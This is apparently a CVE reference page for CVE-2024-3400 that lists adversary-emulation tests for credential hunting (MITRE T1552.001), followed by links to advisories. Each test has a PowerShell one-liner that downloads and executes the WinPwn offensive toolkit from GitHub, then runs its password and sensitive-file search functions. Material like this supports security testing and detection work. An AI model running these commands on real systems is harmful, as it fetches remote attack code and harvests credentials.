iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
T1552.001 WinPwn - passhunt Windows PowerShell
Search for Passwords on this system using passhunt via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
T1552.001 WinPwn - powershellsensitive Windows PowerShell
Check Powershell event logs for credentials or other sensitive information via winpwn powershellsensitive function.
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
T1552.001 WinPwn - sensitivefiles Windows PowerShell
Search for sensitive files on this local system using the SensitiveFiles function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput

Detection & Response Rules

No detection or response rules found for this CVE.

No news articles found for this CVE.

References (6)

Title Tags URL
nvd.nist.gov
NVD reference
https://nvd.nist.gov/vuln/detail/CVE-2024-3400
security.paloaltonetworks.com
GitHub CVE vendor-advisory
https://security.paloaltonetworks.com/CVE-2024-3400
unit42.paloaltonetworks.com
GitHub CVE technical-description
https://unit42.paloaltonetworks.com/cve-2024-3400/
volexity.com
GitHub CVE technical-description
https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/
paloaltonetworks.com
GitHub CVE technical-description
https://www.paloaltonetworks.com/blog/2024/04/more-on-the-pan-os-cve/
cisa.gov
NVD API US Government Resource
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-3400